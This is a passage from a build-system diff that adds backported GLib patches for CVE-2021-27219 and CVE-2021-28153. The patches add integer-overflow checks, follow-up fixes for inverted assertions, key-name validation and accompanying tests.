28index 1e437a7b6..dbcec41a8 100644
29--- a/gio/gtlspassword.c
30+++ b/gio/gtlspassword.c
31@@ -23,6 +23,7 @@
32 #include "glibintl.h"
33
34 #include "gioenumtypes.h"
35+#include "gstrfuncsprivate.h"
36 #include "gtlspassword.h"
37
38 #include <string.h>
39@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword *password,
40 g_return_if_fail (G_IS_TLS_PASSWORD (password));
41
42 if (length < 0)
43- length = strlen ((gchar *)value);
44+ {
45+ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
46+ gsize length_unsigned = strlen ((gchar *) value);
47+ g_return_if_fail (length_unsigned > G_MAXSSIZE);
48+ length = (gssize) length_unsigned;
49+ }
50
51- g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free);
52+ g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free);
53 }
54
55 /**
56--
57GitLab
58
59
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
new file mode 100644
index 0000000000..a620a49269
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
@@ -0,0 +1,63 @@
1From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 14:09:40 +0000
4Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that
10nul-terminated strings passed to `g_io_channel_set_line_term()` can’t
11exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()`
12is due to be deprecated), but not to avoid a bug, since it’s also
13limited to `G_MAXUINT`.
14
15Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
16Helps: #2319
17
18Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
19CVE: CVE-2021-27219
20Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
21Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
22
23---
24 glib/giochannel.c | 17 +++++++++++++----
25 1 file changed, 13 insertions(+), 4 deletions(-)
26
27diff --git a/glib/giochannel.c b/glib/giochannel.c
28index c6a89d6e0..4dec20f77 100644
29--- a/glib/giochannel.c
30+++ b/glib/giochannel.c
31@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel *channel,
32 const gchar *line_term,
33 gint length)
34 {
35+ guint length_unsigned;
36+
37 g_return_if_fail (channel != NULL);
38 g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */
39
40 if (line_term == NULL)
41- length = 0;
42- else if (length < 0)
43- length = strlen (line_term);
44+ length_unsigned = 0;
45+ else if (length >= 0)
46+ length_unsigned = (guint) length;
47+ else
48+ {
49+ /* FIXME: We’re constrained by line_term_len being a guint here */
50+ gsize length_size = strlen (line_term);
51+ g_return_if_fail (length_size > G_MAXUINT);
52+ length_unsigned = (guint) length_size;
53+ }
54
55 g_free (channel->line_term);
56- channel->line_term = line_term ? g_memdup (line_term, length) : NULL;
57+ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
58 channel->line_term_len = length;
59 }
60
61--
62GitLab
63
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
new file mode 100644
index 0000000000..3047062f54
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
@@ -0,0 +1,36 @@
1From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001
2From: "Jan Alexander Steffens (heftig)" <jan.steffens@gmail.com>
3Date: Sun, 7 Feb 2021 23:32:40 +0100
4Subject: [PATCH 1/5] giochannel: Fix length_size bounds check
5
6The inverted condition is an obvious error introduced by ecdf91400e9a.
7
8Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323
9
10(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176)
11
12Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
13CVE: CVE-2021-27219
14Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
15
16---
17 glib/giochannel.c | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/glib/giochannel.c b/glib/giochannel.c
21index 4dec20f77..c3f3102ff 100644
22--- a/glib/giochannel.c
23+++ b/glib/giochannel.c
24@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
25 {
26 /* FIXME: We’re constrained by line_term_len being a guint here */
27 gsize length_size = strlen (line_term);
28- g_return_if_fail (length_size > G_MAXUINT);
29+ g_return_if_fail (length_size <= G_MAXUINT);
30 length_unsigned = (guint) length_size;
31 }
32
33--
34GitLab
35
36
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
new file mode 100644
index 0000000000..2ba26075df
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
@@ -0,0 +1,38 @@
1From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001
2From: Simon McVittie <smcv@collabora.com>
3Date: Mon, 8 Feb 2021 10:34:50 +0000
4Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in
5 GIOChannel struct
6
7Adding test coverage indicated that this was another bug in 0cc11f74.
8
9Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings"
10Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323
11Signed-off-by: Simon McVittie <smcv@collabora.com>
12(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628)
13
14Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
15CVE: CVE-2021-27219
16Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
17
18---
19 glib/giochannel.c | 2 +-
20 1 file changed, 1 insertion(+), 1 deletion(-)
21
22diff --git a/glib/giochannel.c b/glib/giochannel.c
23index c3f3102ff..19bb06ba6 100644
24--- a/glib/giochannel.c
25+++ b/glib/giochannel.c
26@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
27
28 g_free (channel->line_term);
29 channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
30- channel->line_term_len = length;
31+ channel->line_term_len = length_unsigned;
32 }
33
34 /**
35--
36GitLab
37
38
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
new file mode 100644
index 0000000000..2c388b4bbb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
@@ -0,0 +1,38 @@
1From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001
2From: Simon McVittie <smcv@collabora.com>
3Date: Mon, 8 Feb 2021 10:04:48 +0000
4Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion
5
6The intention here was to assert that the length of the password fits
7in a gssize. Passwords more than half the size of virtual memory are
8probably excessive.
9
10Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords"
11Signed-off-by: Simon McVittie <smcv@collabora.com>
12(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8)
13
14Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
15CVE: CVE-2021-27219
16Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
17
18---
19 gio/gtlspassword.c | 2 +-
20 1 file changed, 1 insertion(+), 1 deletion(-)
21
22diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
23index dbcec41a8..bd86a6dfe 100644
24--- a/gio/gtlspassword.c
25+++ b/gio/gtlspassword.c
26@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword *password,
27 {
28 /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
29 gsize length_unsigned = strlen ((gchar *) value);
30- g_return_if_fail (length_unsigned > G_MAXSSIZE);
31+ g_return_if_fail (length_unsigned <= G_MAXSSIZE);
32 length = (gssize) length_unsigned;
33 }
34
35--
36GitLab
37
38
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
new file mode 100644
index 0000000000..356e986fe0
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
@@ -0,0 +1,100 @@
1From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001
2From: Simon McVittie <smcv@collabora.com>
3Date: Mon, 8 Feb 2021 10:22:39 +0000
4Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to
5 set the password
6
7Signed-off-by: Simon McVittie <smcv@collabora.com>
8(cherry picked from commit df4501316ca3903072400504a5ea76498db19538)
9
10Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
11CVE: CVE-2021-27219
12Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
13
14---
15 gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++
16 1 file changed, 55 insertions(+)
17
18diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c
19index 4f0737d7e..5661e8e0d 100644
20--- a/gio/tests/tls-interaction.c
21+++ b/gio/tests/tls-interaction.c
22@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction *interaction,
23 }
24
25
26+/* Return a copy of @str that is allocated in a silly way, to exercise
27+ * custom free-functions. The returned pointer points to a copy of @str
28+ * in a buffer of the form "BEFORE \0 str \0 AFTER". */
29+static guchar *
30+special_dup (const char *str)
31+{
32+ GString *buf = g_string_new ("BEFORE");
33+ guchar *ret;
34+
35+ g_string_append_c (buf, '\0');
36+ g_string_append (buf, str);
37+ g_string_append_c (buf, '\0');
38+ g_string_append (buf, "AFTER");
39+ ret = (guchar *) g_string_free (buf, FALSE);
40+ return ret + strlen ("BEFORE") + 1;
41+}
42+
43+
44+/* Free a copy of @str that was made with special_dup(), after asserting
45+ * that it has not been corrupted. */
46+static void
47+special_free (gpointer p)
48+{
49+ gchar *s = p;
50+ gchar *buf = s - strlen ("BEFORE") - 1;
51+
52+ g_assert_cmpstr (buf, ==, "BEFORE");
53+ g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER");
54+ g_free (buf);
55+}
56+
57+
58 static GTlsInteractionResult
59 test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
60 GTlsPassword *password,
61@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
62 GError **error)
63 {
64 TestInteraction *self;
65+ const guchar *value;
66+ gsize len;
67
68 g_assert (TEST_IS_INTERACTION (interaction));
69 self = TEST_INTERACTION (interaction);
70@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
71 g_assert (error != NULL);
72 g_assert (*error == NULL);
73
74+ /* Exercise different ways to set the value */
75+ g_tls_password_set_value (password, (const guchar *) "foo", 4);
76+ len = 0;
77+ value = g_tls_password_get_value (password, &len);
78+ g_assert_cmpmem (value, len, "foo", 4);
79+
80+ g_tls_password_set_value (password, (const guchar *) "bar", -1);
81+ len = 0;
82+ value = g_tls_password_get_value (password, &len);
83+ g_assert_cmpmem (value, len, "bar", 3);
84+
85+ g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free);
86+ len = 0;
87+ value = g_tls_password_get_value (password, &len);
88+ g_assert_cmpmem (value, len, "baa", 4);
89+
90+ g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free);
91+ len = 0;
92+ value = g_tls_password_get_value (password, &len);
93+ g_assert_cmpmem (value, len, "baz", 3);
94+
95 /* Don't do this in real life. Include a null terminator for testing */
96 g_tls_password_set_value (password, (const guchar *)"the password", 13);
97 return G_TLS_INTERACTION_HANDLED;
98--
99GitLab
100
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
new file mode 100644
index 0000000000..dd43689aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
@@ -0,0 +1,49 @@
1From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Wed, 10 Feb 2021 21:16:39 +0000
4Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group
5 is unset
6
7Fix an effective regression in commit
87781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when
9`convert_path()` is called with a `key` which contains no slashes. In
10that case, the `key` is entirely the `basename`.
11
12Prior to commit 7781a9cb, the code worked through a fluke of `i == -1`
13cancelling out with the various additions in the `g_memdup()` call, and
14effectively resulting in `g_strdup (key)`.
15
16Spotted by Guido Berhoerster.
17
18Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
19
20Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
21CVE: CVE-2021-27219
22Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
23
24---
25 gio/gkeyfilesettingsbackend.c | 7 ++++++-
26 1 file changed, 6 insertions(+), 1 deletion(-)
27
28diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
29index 25b057672..861c3a661 100644
30--- a/gio/gkeyfilesettingsbackend.c
31+++ b/gio/gkeyfilesettingsbackend.c
32@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend *kfsb,
33 }
34
35 if (basename)
36- *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
37+ {
38+ if (last_slash != NULL)
39+ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
40+ else
41+ *basename = g_strdup (key);
42+ }
43
44 return TRUE;
45 }
46--
47GitLab
48
49
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
new file mode 100644
index 0000000000..04503641c3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
@@ -0,0 +1,43 @@
1From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Wed, 10 Feb 2021 21:19:30 +0000
4Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group
5 names
6
7These should never have been allowed; they will result in precondition
8failures from the `GKeyFile` later on in the code.
9
10A test will be added for this shortly.
11
12Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
13
14Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
15CVE: CVE-2021-27219
16Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
17
18---
19 gio/gkeyfilesettingsbackend.c | 7 +++++++
20 1 file changed, 7 insertions(+)
21
22diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
23index 861c3a661..de216e615 100644
24--- a/gio/gkeyfilesettingsbackend.c
25+++ b/gio/gkeyfilesettingsbackend.c
26@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend *kfsb,
27
28 last_slash = strrchr (key, '/');
29
30+ /* Disallow empty group names or key names */
31+ if (key_len == 0 ||
32+ (last_slash != NULL &&
33+ (*(last_slash + 1) == '\0' ||
34+ last_slash == key)))
35+ return FALSE;
36+
37 if (kfsb->root_group)
38 {
39 /* if a root_group was specified, make sure the user hasn't given
40--
41GitLab
42
43
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
new file mode 100644
index 0000000000..65f59287a8
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
@@ -0,0 +1,232 @@
1Backport of:
2
3From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001
4From: Philip Withnall <pwithnall@endlessos.org>
5Date: Wed, 10 Feb 2021 21:21:36 +0000
6Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile
7 backend
8
9This tests the two recent commits.
10
11Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
12
13Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
14CVE: CVE-2021-27219
15Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
16
17---
18 gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++-
19 1 file changed, 169 insertions(+), 1 deletion(-)
20
21--- a/gio/tests/gsettings.c
22+++ b/gio/tests/gsettings.c
23@@ -1,3 +1,4 @@
24+#include <errno.h>
25 #include <stdlib.h>
26 #include <locale.h>
27 #include <libintl.h>
28@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con
29 (*b) = TRUE;
30 }
31
32+typedef struct
33+{
34+ const gchar *path;
35+ const gchar *root_group;
36+ const gchar *keyfile_group;
37+ const gchar *root_path;
38+} KeyfileTestData;
39+
40 /*
41 * Test that using a keyfile works
42 */
43@@ -1834,7 +1843,11 @@ test_keyfile (Fixture *fixture,
44 g_free (str);
45
46 g_settings_set (settings, "farewell", "s", "cheerio");
47-
48+
49+ /* Check that empty keys/groups are not allowed. */
50+ g_assert_false (g_settings_is_writable (settings, ""));
51+ g_assert_false (g_settings_is_writable (settings, "/"));
52+
53 /* When executing as root, changing the mode of the keyfile will have
54 * no effect on the writability of the settings.
55 */
56@@ -1866,6 +1879,149 @@ test_keyfile (Fixture *fixture,
57 g_free (keyfile_path);
58 }
59
60+/*
61+ * Test that using a keyfile works with a schema with no path set.
62+ */
63+static void
64+test_keyfile_no_path (Fixture *fixture,
65+ gconstpointer user_data)
66+{
67+ const KeyfileTestData *test_data = user_data;
68+ GSettingsBackend *kf_backend;
69+ GSettings *settings;
70+ GKeyFile *keyfile;
71+ gboolean writable;
72+ gchar *key = NULL;
73+ GError *error = NULL;
74+ gchar *keyfile_path = NULL, *store_path = NULL;
75+
76+ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
77+ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
78+ kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group);
79+ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path);
80+ g_object_unref (kf_backend);
81+
82+ g_settings_reset (settings, "test-boolean");
83+ g_assert_true (g_settings_get_boolean (settings, "test-boolean"));
84+
85+ writable = g_settings_is_writable (settings, "test-boolean");
86+ g_assert_true (writable);
87+ g_settings_set (settings, "test-boolean", "b", FALSE);
88+
89+ g_assert_false (g_settings_get_boolean (settings, "test-boolean"));
90+
91+ g_settings_delay (settings);
92+ g_settings_set (settings, "test-boolean", "b", TRUE);
93+ g_settings_apply (settings);
94+
95+ keyfile = g_key_file_new ();
96+ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
97+
98+ g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL));
99+
100+ g_key_file_free (keyfile);
101+
102+ g_settings_reset (settings, "test-boolean");
103+ g_settings_apply (settings);
104+ keyfile = g_key_file_new ();
105+ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
106+
107+ g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error));
108+ g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND);
109+ g_clear_error (&error);
110+
111+ /* Check that empty keys/groups are not allowed. */
112+ g_assert_false (g_settings_is_writable (settings, ""));
113+ g_assert_false (g_settings_is_writable (settings, "/"));
114+
115+ /* Keys which ghost the root group name are not allowed. This can only be
116+ * tested when the path is `/` as otherwise it acts as a prefix and prevents
117+ * any ghosting. */
118+ if (g_str_equal (test_data->path, "/"))
119+ {
120+ key = g_strdup_printf ("%s/%s", test_data->root_group, "");
121+ g_assert_false (g_settings_is_writable (settings, key));
122+ g_free (key);
123+
124+ key = g_strdup_printf ("%s/%s", test_data->root_group, "/");
125+ g_assert_false (g_settings_is_writable (settings, key));
126+ g_free (key);
127+
128+ key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean");
129+ g_assert_false (g_settings_is_writable (settings, key));
130+ g_free (key);
131+ }
132+
133+ g_key_file_free (keyfile);
134+ g_object_unref (settings);
135+
136+ /* Clean up the temporary directory. */
137+ g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0);
138+ g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0);
139+ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
140+ g_free (store_path);
141+ g_free (keyfile_path);
142+}
143+
144+/*
145+ * Test that a keyfile rejects writes to keys outside its root path.
146+ */
147+static void
148+test_keyfile_outside_root_path (Fixture *fixture,
149+ gconstpointer user_data)
150+{
151+ GSettingsBackend *kf_backend;
152+ GSettings *settings;
153+ gchar *keyfile_path = NULL, *store_path = NULL;
154+
155+ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
156+ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
157+ kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root");
158+ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/");
159+ g_object_unref (kf_backend);
160+
161+ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
162+
163+ g_object_unref (settings);
164+
165+ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
166+ * don’t error on failure. */
167+ g_remove (store_path);
168+ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
169+ g_free (store_path);
170+ g_free (keyfile_path);
171+}
172+
173+/*
174+ * Test that a keyfile rejects writes to keys in the root if no root group is set.
175+ */
176+static void
177+test_keyfile_no_root_group (Fixture *fixture,
178+ gconstpointer user_data)
179+{
180+ GSettingsBackend *kf_backend;
181+ GSettings *settings;
182+ gchar *keyfile_path = NULL, *store_path = NULL;
183+
184+ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
185+ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
186+ kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL);
187+ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/");
188+ g_object_unref (kf_backend);
189+
190+ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
191+ g_assert_true (g_settings_is_writable (settings, "child/test-boolean"));
192+
193+ g_object_unref (settings);
194+
195+ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
196+ * don’t error on failure. */
197+ g_remove (store_path);
198+ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
199+ g_free (store_path);
200+ g_free (keyfile_path);
201+}
202+
203 /* Test that getting child schemas works
204 */
205 static void
206@@ -2844,6 +3000,14 @@ main (int argc, char *argv[])
207 gchar *override_text;
208 gchar *enums;
209 gint result;
210+ const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" };
211+ const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" };
212+ const KeyfileTestData keyfile_test_data_long_path = {
213+ "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/",
214+ "root",
215+ "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch",
216+ "/"
217+ };
218
219 /* Meson build sets this */
220 #ifdef TEST_LOCALE_PATH
221@@ -2967,6 +3131,11 @@ main (int argc, char *argv[])
222 }
223
224 g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown);
225+ g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown);
226+ g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown);
227+ g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown);
228+ g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown);
229+ g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown);
230 g_test_add_func ("/gsettings/child-schema", test_child_schema);
231 g_test_add_func ("/gsettings/strinfo", test_strinfo);
232 g_test_add_func ("/gsettings/enums", test_enums);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
new file mode 100644
index 0000000000..c89ca20726
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
@@ -0,0 +1,27 @@
1From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Wed, 24 Feb 2021 17:33:38 +0000
4Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment
5
6Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
7
8Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
9CVE: CVE-2021-28153
10Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
11Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
12
13---
14 gio/glocalfileoutputstream.c | 2 +-
15 1 file changed, 1 insertion(+), 1 deletion(-)
16
17--- a/gio/glocalfileoutputstream.c
18+++ b/gio/glocalfileoutputstream.c
19@@ -851,7 +851,7 @@ handle_overwrite_open (const char *fi
20 mode = mode_from_flags_or_info (flags, reference_info);
21
22 /* We only need read access to the original file if we are creating a backup.
23- * We also add O_CREATE to avoid a race if the file was just removed */
24+ * We also add O_CREAT to avoid a race if the file was just removed */
25 if (create_backup || readable)
26 open_flags = O_RDWR | O_CREAT | O_BINARY;
27 else
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
new file mode 100644
index 0000000000..8a35bab4de
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
@@ -0,0 +1,42 @@
1From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Wed, 24 Feb 2021 17:34:32 +0000
4Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Since a following commit is going to add a new test which references
10Gitlab, so it’s best to move the URI bases inside the test cases.
11
12Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
13
14Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
15CVE: CVE-2021-28153
16Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
17Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
18
19---
20 gio/tests/file.c | 4 +---
21 1 file changed, 1 insertion(+), 3 deletions(-)
22
23--- a/gio/tests/file.c
24+++ b/gio/tests/file.c
25@@ -685,7 +685,7 @@ test_replace_cancel (void)
26 guint count;
27 GError *error = NULL;
28
29- g_test_bug ("629301");
30+ g_test_bug ("https://bugzilla.gnome.org/629301");
31
32 path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error);
33 g_assert_no_error (error);
34@@ -1784,8 +1784,6 @@ main (int argc, char *argv[])
35 {
36 g_test_init (&argc, &argv, NULL);
37
38- g_test_bug_base ("http://bugzilla.gnome.org/");
39-
40 g_test_add_func ("/file/basic", test_basic);
41 g_test_add_func ("/file/build-filename", test_build_filename);
42 g_test_add_func ("/file/parent", test_parent);
